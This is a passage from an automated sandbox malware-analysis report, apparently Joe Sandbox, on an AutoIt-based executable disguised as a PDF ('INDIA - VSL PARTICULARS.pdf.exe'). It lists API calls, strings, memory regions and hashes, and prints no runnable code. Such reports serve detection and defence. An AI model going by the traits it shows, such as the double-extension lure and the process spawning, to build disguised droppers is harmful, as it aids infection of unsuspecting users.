                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpen
                              • String ID: Include$Software\AutoIt v3\AutoIt
                              • API String ID: 1586453840-614718249
                              • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                              • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                              • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                              • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                              APIs
                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                              • ShowWindow.USER32(?,00000000), ref: 004105E4
                              • ShowWindow.USER32(?,00000000), ref: 004105EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$CreateShow
                              • String ID: AutoIt v3$edit
                              • API String ID: 1584632944-3779509399
                              • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                              • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                              APIs
                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcsncpy.LIBCMT ref: 00401C41
                              • _wcscpy.LIBCMT ref: 00401C5D
                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                              • String ID: Line:
                              • API String ID: 1874344091-1585850449
                              • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                              • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                              APIs
                              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                              • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                              • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Close$OpenQueryValue
                              • String ID: Control Panel\Mouse
                              • API String ID: 1607946009-824357125
                              • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                              • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: #v
                              • API String ID: 0-554117064
                              • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                              • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                              APIs
                                • Part of subcall function 03F1F768: Sleep.KERNELBASE(000001F4), ref: 03F1F779
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F1F9CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateFileSleep
                              • String ID: R8OJXRICD5G6CY5B477QDWTMP7C
                              • API String ID: 2694422964-218949812
                              • Opcode ID: ba3483c7acc50c8a65122e84a31b9251bda3a721f157ce0620c98c5d2828ef56
                              • Instruction ID: 09a708a3e34b074ea20d8c0acc83a2fbb653479c043ab43114b1d0b44abefb73
                              • Opcode Fuzzy Hash: ba3483c7acc50c8a65122e84a31b9251bda3a721f157ce0620c98c5d2828ef56
                              • Instruction Fuzzy Hash: 1361B431D04388DAEF11DBB4D844BEEBBB9AF19304F044199E248BB2C1D7B90B49CB65
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                              • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process$CurrentTerminate
                              • String ID: #v
                              • API String ID: 2429186680-554117064
                              • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                              • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                              APIs
                                • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                              • _free.LIBCMT ref: 004295A0
                                • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                              • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 3938964917-398759878
                              • Opcode ID: 9e552fd7923e986f2723e425eb34f406980c652e500e15cac68f830d5ee71b03
                              • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                              • Opcode Fuzzy Hash: 9e552fd7923e986f2723e425eb34f406980c652e500e15cac68f830d5ee71b03
                              • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: Error:
                              • API String ID: 4104443479-232661952
                              • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                              • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                              • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                              • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                              APIs
                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,0040F545,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,004A90E8,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                              • String ID: X$pWH
                              • API String ID: 85490731-941433119
                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 03F1E50D
                              • ExitProcess.KERNEL32(00000000), ref: 03F1E52C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process$CreateExit
                              • String ID: D
                              • API String ID: 126409537-2746444292
                              • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                              • Instruction ID: 2ee268bf847db4fd1eb15a49fdbe85edc04d6f773497a2143467970779f6de50
                              • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                              • Instruction Fuzzy Hash: C1F0FF7694024CABDB60EFE4DC49FEE777CBF04701F448508FB0ADA184EA7896188B61
                              APIs
                              • _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 00401B57
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                              • String ID: @EXITCODE
                              • API String ID: 2734553683-3436989551
                              • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                              • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                              • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                              • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                              Strings
                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                              • C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, xrefs: 00410107
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _strcat
                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 1765576173-3330988521
                              • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                              • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __filbuf__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 1794320848-0
                              • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                              • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                              APIs
                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconNotifyShell_
                              • String ID:
                              • API String ID: 1144537725-0
                              • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                              • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                              APIs
                              • _malloc.LIBCMT ref: 0043214B
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _malloc.LIBCMT ref: 0043215D
                              • _malloc.LIBCMT ref: 0043216F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _malloc$AllocateHeap
                              • String ID:
                              • API String ID: 680241177-0
                              • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                              • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                              • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                              APIs
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Message$DispatchPeekTranslate
                              • String ID:
                              • API String ID: 4217535847-0
